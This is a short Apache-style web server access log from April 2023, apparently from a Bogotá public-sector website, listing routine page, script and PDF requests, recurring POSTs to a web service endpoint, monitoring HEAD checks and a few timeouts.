201.245.192.253 - - [06/Apr/2023:07:37:27 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
172.22.2.4 - - [06/Apr/2023:07:36:33 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56277
66.249.70.213 - - [06/Apr/2023:07:40:03 -0500] "-" 408 -
201.245.192.253 - - [06/Apr/2023:07:40:12 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42879
201.245.192.253 - - [06/Apr/2023:07:40:14 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43200
216.245.221.92 - - [06/Apr/2023:07:40:38 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [06/Apr/2023:07:42:26 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
168.119.251.242 - - [06/Apr/2023:07:42:38 -0500] "GET / HTTP/1.1" 200 319
168.119.251.242 - - [06/Apr/2023:07:42:38 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [06/Apr/2023:07:41:33 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Apr/2023:07:42:23 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56744
216.245.221.92 - - [06/Apr/2023:07:45:38 -0500] "HEAD / HTTP/1.1" 200 -
191.156.33.87 - - [06/Apr/2023:07:47:21 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
191.156.42.112 - - [06/Apr/2023:07:47:21 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
191.156.39.160 - - [06/Apr/2023:07:47:21 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
201.245.192.253 - - [06/Apr/2023:07:47:25 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
172.22.2.4 - - [06/Apr/2023:07:47:23 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Apr/2023:07:48:13 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
66.249.70.184 - - [06/Apr/2023:07:50:03 -0500] "-" 408 -
172.22.2.4 - - [06/Apr/2023:07:50:13 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1037
172.22.2.4 - - [06/Apr/2023:07:50:13 -0500] "GET /BLA/boletinlegal/Directivas/2011/Directiva%20No.%2011%20del%2027%20de%20Diciembre%20de%202011.pdf HTTP/1.1" 200 303527
216.245.221.92 - - [06/Apr/2023:07:50:38 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [06/Apr/2023:07:52:24 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
172.22.2.4 - - [06/Apr/2023:07:54:33 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
172.22.2.4 - - [06/Apr/2023:07:53:13 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
35.204.80.241 - - [06/Apr/2023:07:55:33 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
216.245.221.92 - - [06/Apr/2023:07:55:38 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [06/Apr/2023:07:54:03 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59646
34.91.10.255 - - [06/Apr/2023:07:55:58 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
34.91.50.11 - - [06/Apr/2023:07:56:18 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
85.238.209.247 - - [06/Apr/2023:07:56:48 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [06/Apr/2023:07:57:23 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
35.204.241.77 - - [06/Apr/2023:07:58:33 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
34.91.36.176 - - [06/Apr/2023:07:58:38 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
172.22.2.4 - - [06/Apr/2023:07:59:29 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
172.22.2.4 - - [06/Apr/2023:08:00:24 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
216.245.221.92 - - [06/Apr/2023:08:00:38 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [06/Apr/2023:07:59:03 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Apr/2023:07:59:53 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53104
172.22.2.4 - - [06/Apr/2023:08:01:49 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
172.22.2.4 - - [06/Apr/2023:08:02:04 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
201.245.192.253 - - [06/Apr/2023:08:02:21 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
34.91.50.11 - - [06/Apr/2023:08:03:30 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
172.22.2.4 - - [06/Apr/2023:08:04:10 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
34.147.120.241 - - [06/Apr/2023:08:04:15 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
172.22.2.4 - - [06/Apr/2023:08:04:33 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
216.245.221.92 - - [06/Apr/2023:08:05:38 -0500] "HEAD / HTTP/1.1" 200 -
